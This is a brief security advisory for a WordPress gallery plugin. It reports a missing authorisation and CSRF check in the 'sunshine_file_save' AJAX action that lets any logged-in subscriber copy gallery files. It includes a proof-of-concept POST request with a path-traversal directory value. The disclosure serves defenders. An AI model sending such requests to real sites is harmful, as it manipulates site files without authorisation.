The plugin does not have authorisation and Cross-Site Request Forgery (CSRF) check in an AJAX action, which could allow any authenticated users, such as subscriber to copy the gallery files to another folder.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
action=sunshine_file_save&gallery_id=1&dir=..%2Ftest&item_number=100
This function copies the jpg files from /uploads/test
to /uploads/sunshine/1
folder.